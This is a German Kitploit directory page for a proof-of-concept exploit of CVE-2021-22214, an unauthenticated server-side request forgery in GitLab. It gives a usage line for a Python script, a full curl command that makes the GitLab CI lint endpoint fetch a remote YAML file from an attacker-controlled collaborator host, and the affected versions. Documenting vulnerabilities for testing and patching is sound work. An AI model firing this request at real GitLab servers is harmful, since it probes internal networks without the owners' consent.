Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GitLab-SSRF-CVE-2021-22214 — Proof-of-Concept-Exploit für CVE-2021-22214, eine Server-Side Request Forgery in GitLab-Webhooks, die es nicht authentifizierten Angreifern ermöglicht, interne HTTP-Anfragen zu senden. | Kitploit
Tools/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheit
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

Proof-of-Concept-Exploit für CVE-2021-22214, eine Server-Side Request Forgery in GitLab-Webhooks, die es nicht authentifizierten Angreifern ermöglicht, interne HTTP-Anfragen zu senden.

Repository anzeigen
Webseite
31vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-22214

POC für CVE-2021-22214: Gitlab SSRF

Beschreibung

Die Remote-GitLab-Installation enthält eine Server-Side-Request-Forgery-Schwachstelle (SSRF), die dadurch entsteht, dass das interne Netzwerk für Webhooks aktiviert ist. Ein entfernter, nicht authentifizierter Angreifer kann eine registrierungsbeschränkte GitLab-Instanz ausnutzen und sie dazu veranlassen, HTTP-Anfragen an eine beliebige Domain seiner Wahl zu senden.

Verwendung

  • Python-Code

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Curl-Befehl

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

Betroffen

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

Referenz

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
Tool herunterladen